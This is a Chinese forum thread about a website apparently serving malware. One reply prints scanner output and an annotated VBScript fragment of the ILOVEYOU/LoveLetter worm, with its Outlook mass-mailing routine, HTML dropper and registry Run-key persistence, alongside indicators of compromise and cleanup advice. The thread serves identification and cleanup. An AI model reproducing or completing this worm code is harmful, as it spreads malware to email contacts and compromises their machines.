作者: 112 [mnbvcxz123] 论坛用户
http://dfzx123.91i.net 自己看看啊, 是不是被病毒攻击啊 |
地主 发表时间: 06/30 16:51 |
回复: sky2003 [sky2003] 论坛用户
上传网页 覆盖掉 |
B1层 发表时间: 07/01 17:33 |
回复: badboy [badboy] 论坛用户
当前正在执行的程序的名称和打开的文件的名称是: "D:\Program Files\Tencent\qq\tbrowser.exe" "http://dfzx123.91i.net " ********************************************************************************************* 可疑代码的动作如下: 有创建了E_Mail的对象的动作 有寻找 E_Mail 地址的动作 有发 E_Mail 的动作 有添加附件的动作 有读注册表的动作 有写注册表的动作 有创建文件对象的动作 有写文件的动作 有读文件的动作 ********************************************************************************************* 可疑代码显示如下:
' ===========================================================================
' Analyst annotation (review). The script below is the fragment the scanner
' pulled out of the page served at dfzx123.91i.net. Its own metadata -- the
' Generator/Author META tags assembled in sub html -- reads
' "BAROK VBS - LOVELETTER" / "spyder ... @GRAMMERSoft Group, Manila,
' Philippines, March 2000", and it mails itself with subject "ILOVEYOU": this
' is the VBS.LoveLetter ("ILOVEYOU") worm, not VBS.Haptime (欢乐时光) as B3
' asks.
' Only the mail-spreading routine, the HTML dropper and three helpers are in
' this paste; the code that defines the globals fso and dirsystem (and the
' worm's other routines) is not shown, so the fragment is not runnable as is.
' Spaces inside string literals such as "REG_D WORD", "Curre ntVersion",
' "window.mo veTo", "H TML" and "LOVE-LETTER- FOR-YOU.HTM" are line-wrap
' artifacts of the forum rendering; they are left exactly as pasted.
' The "HOME FREE HEADER CODE" fragment with raw double quotes inside the dta1
' literal cannot be part of a valid VBScript string; it looks like an ad
' header the free host injects into pages it serves, which suggests the
' worm-generated LOVE-LETTER-FOR-YOU.HTM was uploaded as site content from an
' infected workstation -- confirm against the uploaded files.
' Indicators visible in this fragment (to check on that workstation):
'   HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
'   <system folder>\MSKernel32.vbs (GetSpecialFolder(1) is the system folder)
'   <system folder>\LOVE-LETTER-FOR-YOU.HTM
'   <system folder>\LOVE-LETTER-FOR-YOU.TXT.vbs (referenced as attachment)
'   HKCU\Software\Microsoft\WAB\<address> and \<list> marker values
' Clean the workstation before re-uploading the site, or the files come back.
' ===========================================================================

' regget: read one registry value via WScript.Shell.RegRead.
' regedit is assigned without Dim -- the fragment has no Option Explicit,
' so it silently becomes a global.
function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget = regedit.RegRead(value)
end function

' fileexist: returns 0 when the file exists and 1 when it does not
' (inverted from the usual boolean sense). Uses the global fso, which is
' not defined anywhere in this fragment.
function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
        msg = 0
    else
        msg = 1
    end if
    fileexist = msg
end function

' folderexist: same shape as fileexist, but the last line assigns to
' fileexist instead of folderexist, so this function never sets its own
' return value. GetFolderExists also does not look like an FSO method
' (FolderExists is) -- verify; under On Error Resume Next both slips are
' silent. Left as in the sample.
function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
        msg = 0
    else
        msg = 1
    end if
    fileexist = msg
end function

' spreadtoemail: mail the worm to every entry of every Outlook address list.
' Bookkeeping lives in the registry so re-runs only mail new addresses:
'   HKCU\Software\Microsoft\WAB\<list>    = number of entries already seen
'   HKCU\Software\Microsoft\WAB\<address> = 1 once a mail has been sent
' Each message has subject "ILOVEYOU", a one-line body, and the attachment
' <dirsystem>\LOVE-LETTER-FOR-YOU.TXT.vbs. Everything runs under
' On Error Resume Next, so if Outlook is absent the sub does nothing.
sub spreadtoemail()
    On Error Resume Next
    dim x, a, ctrlists, ctrentries, malead, b, regedit, regv, regad
    set regedit = CreateObject("WScript.Shell")
    set out = WScript.CreateObject("Outlook.Application")
    set mapi = out.GetNameSpace("MAPI")
    for ctrlists = 1 to mapi.AddressLists.Count
        set a = mapi.AddressLists(ctrlists)
        x = 1
        ' Per-list counter; an empty value means the list was never processed.
        regv = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & a)
        if (regv = "") then
            regv = 1
        end if
        ' Only revisit a list that has grown since the stored count.
        if (int(a.AddressEntries.Count) > int(regv)) then
            for ctrentries = 1 to a.AddressEntries.Count
                ' x walks the entries in step with ctrentries, which is itself unused.
                malead = a.AddressEntries(x)
                regad = ""
                regad = regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead)
                ' No per-address marker yet -> send, then mark.
                if (regad = "") then
                    set male = out.CreateItem(0)
                    male.Recipients.Add(malead)
                    male.Subject = "ILOVEYOU"
                    male.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
                    male.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
                    male.Send
                    ' "REG_D WORD" is a wrap artifact of the paste (presumably REG_DWORD).
                    regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & malead, 1, "REG_D WORD"
                end if
                x = x + 1
            next
            ' Store the new entry count for this list.
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        else
            regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
        end if
    next
    Set out = Nothing
    Set mapi = Nothing
end sub

' html: write the HTML dropper <dirsystem>\LOVE-LETTER-FOR-YOU.HTM.
' dta1 and dta2 are the page template with the characters that would break
' a VBScript literal escaped: "#-#" stands for ', "@-@" for ", "?-?" for /
' and "^-^" for \; the replace() calls below restore them (dt5 = decoded
' dta1, dt6 = decoded dta2). The page is a lure ("press YES to enable
' ActiveX") followed by an inline VBScript that decodes the worm source held
' in the variable "code" ("[-[" -> ', "]-]" -> ", "%-%" -> \), writes it to
' <system folder>\MSKernel32.vbs and registers that file under
' HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32.
' The worm source placed between dt5 and dt6 is this script's own file,
' read via WScript.ScriptFullName and escaped with those same three
' sequences, so the dropper carries a complete copy of the worm.
sub html
    On Error Resume Next
    dim lines, n, dta1, dta2, dt1, dt2, dt3, dt4, l1, dt5, dt6
    ' Page header, lure text, a JScript that maximises the window, and the
    ' opening of the VBScript section up to `code=`; the embedded ad header
    ' with raw double quotes is not valid inside this literal (see top note).
    dta1= "<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
    "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
    "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>" &vbcrlf& _
    "<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER- FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
    "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,# -#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@> <!-- START HOME FREE HEADER CODE --> <CENTER><a href="http://www.wu-long.net" target="_blank"><img src="http://www.wu-long.net/images/userpage_logo.gif" width="64" height="60" border="0"></a><a href="http://www.fujian-window.com/" target="_blank"><img src="http://www.wu-long.net/images/ad1.gif" width="468" height="60" border="0"></a></CENTER> <!-- END HOME FREE HEADER CODE --> "&vbcrlf& _
    "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this H TML file <BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
    "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>----------z------- ------------ -z----------<?-?MARQUEE> "&vbcrlf& _
    "<?-?BODY><?-?HTML>"&vbcrlf& _
    "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
    "<!--?-??-?"&vbcrlf& _
    "if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight;window.mo veTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
    "?-??-?-->"&vbcrlf& _
    "<?-?SCRIPT>"&vbcrlf& _
    "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
    "<!--"&vbcrlf& _
    "on error resume next"&vbcrlf& _
    "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
    "aw=1"&vbcrlf& _
    "code="
    ' Tail of the in-page VBScript: decode `code`, drop MSKernel32.vbs into the
    ' system folder, show an ActiveX error if that failed, add the Run key.
    dta2= "set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
    "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
    "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
    "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
    "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
    "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
    "wri.write code4"&vbcrlf& _
    "wri.close"&vbcrlf& _
    "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
    "if (err.number=424) then"&vbcrlf& _
    "aw=0"&vbcrlf& _
    "end if"&vbcrlf& _
    "if (aw=1) then"&vbcrlf& _
    "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
    "window.close"&vbcrlf& _
    "end if"&vbcrlf& _
    "end if"&vbcrlf& _
    "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
    "regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^Curre ntVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
    "?-??-?-->"&vbcrlf& _
    "<?-?SCRIPT>"
    ' Unescape the template: chr(35)=#, chr(64)=@, chr(63)=?, chr(94)=^ each
    ' wrapped in "-" pairs, mapped back to ' " / \.
    dt1 = replace(dta1, chr(35) & chr(45) & chr(35), "'")
    dt1 = replace(dt1, chr(64) & chr(45) & chr(64), """")
    dt4 = replace(dt1, chr(63) & chr(45) & chr(63), "/")
    dt5 = replace(dt4, chr(94) & chr(45) & chr(94), "\")
    dt2 = replace(dta2, chr(35) & chr(45) & chr(35), "'")
    dt2 = replace(dt2, chr(64) & chr(45) & chr(64), """")
    dt3 = replace(dt2, chr(63) & chr(45) & chr(63), "/")
    dt6 = replace(dt3, chr(94) & chr(45) & chr(94), "\")
    ' Read this script's own source (fso is re-created here, unlike the helpers above).
    set fso = CreateObject("Scripting.FileSystemObject")
    set c = fso.OpenTextFile(WScript.ScriptFullName, 1)
    lines = Split(c.ReadAll, vbcrlf)
    l1 = ubound(lines)
    ' Escape ' " \ in every source line with the sequences the dropper decodes.
    for n = 0 to ubound(lines)
        lines(n)=replace(lines(n), "'", chr(91) + chr(45) + chr(91))
        lines(n)=replace(lines(n), """", chr(93) + chr(45) + chr(93))
        lines(n)=replace(lines(n), "\", chr(37) + chr(45) + chr(37))
        ' Empty last-line check: a leftover no-op in the sample.
        if (l1 = n) then
        else
        end if
    next
    ' Create (truncate) the dropper, then write header + escaped source + tail.
    set b=fso.CreateTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem + "\LOVE-LETTER-FOR-YOU.HTM",2)
    d.write dt5
    d.write join(lines, vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
end sub
[此贴被 随风浮尘(badboy) 在 07月04日13时27分 编辑过] |
B2层 发表时间: 07/04 13:35 |
回复: lovexp [lovexp] 论坛用户
啊是传说中的欢乐时光病毒啊? |
B3层 发表时间: 07/05 12:19 |